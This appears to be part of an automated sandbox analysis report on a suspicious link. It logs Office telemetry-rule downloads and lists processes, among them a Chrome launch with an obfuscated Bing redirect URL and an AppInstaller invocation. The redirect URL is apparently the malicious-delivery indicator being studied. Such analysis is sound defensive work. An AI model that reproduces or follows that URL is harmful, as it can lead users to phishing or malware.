                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:11 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1399
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                            x-ms-request-id: 4d8e59a4-701e-0021-64fe-163d45000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030911Z-1657d5bbd48jwrqbupe3ktsx9w00000004k000000000f7fs
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:11 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            146192.168.2.54987013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:11 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1403
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                            x-ms-request-id: d3a3eb01-b01e-003d-1ef1-16d32c000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030911Z-1657d5bbd482lxwq1dp2t1zwkc000000040g00000000u876
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            147192.168.2.54987113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:11 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1366
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                            x-ms-request-id: ca2bab4f-201e-0071-5e14-17ff15000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030911Z-1657d5bbd48qjg85buwfdynm5w00000004gg0000000083r7
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            148192.168.2.54986913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:11 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1362
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                            x-ms-request-id: 0c184816-a01e-000d-72ff-16d1ea000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030911Z-1657d5bbd48762wn1qw4s5sd30000000049g000000007ee7
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:11 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            149192.168.2.54987413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:11 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:11 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1362
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                            x-ms-request-id: 4ef38422-401e-000a-160c-174a7b000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030911Z-1657d5bbd487nf59mzf5b3gk8n000000041g000000008hkg
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:11 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:23:08:29
                                                                                                                                                            Start date:07/10/2024
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:23:08:33
                                                                                                                                                            Start date:07/10/2024
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,5674330579086661350,10920090368458916979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:23:08:35
                                                                                                                                                            Start date:07/10/2024
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cDovL3d3dy40NDQzMTcuY29tLw#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/"
                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:23:09:59
                                                                                                                                                            Start date:07/10/2024
                                                                                                                                                            Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                                                                                                                                            Imagebase:0x7ff614420000
                                                                                                                                                            File size:2'035'200 bytes
                                                                                                                                                            MD5 hash:D4B46459B6A0FB33EB4690FF2B6CE2EF
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            No disassembly